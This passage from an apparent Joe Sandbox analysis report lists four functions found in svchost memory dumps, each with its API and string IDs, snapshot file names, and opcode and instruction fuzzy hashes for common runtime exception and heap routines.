                                                                          Function 000001F28C9394A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: a1389ac8532826ac596aaee6b13d59646ba39f355e91e1ec56b6d169f0d5a3fa
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 61112832214FC182EB618F25E4443A9B7E5FB88B94F598264EE8C07B69DF3CC595CB00
                                                                          Function 000001F28C1D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 09633eca710365df152610dc5942b59f08b7406966c11a0154c1b9ae03bc6ca5
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 09E086B1680F4690DF028F62E8802E837E0DB58BA4B489132DA5C47351FB7CD1E9C300
                                                                          Function 000001F28C1D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 6f46bb36e99698124d87c0e4d324587b24abbfd4879edec8008199ce5951e68a
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 74E0E6B1651F45D4DF028F61E4901E877A5E758B94B889132DA5C47355EB78D1E5C300
                                                                          Function 000001F28C931BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 4d82505500ce06d62ce877f2f89efa63fb9e64a04db03c9d2b6106834071bf2b
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 67113A35641F8686EA54DB66A8082B967E1FB89FC0F1890B9DE4D57776EF38C442C300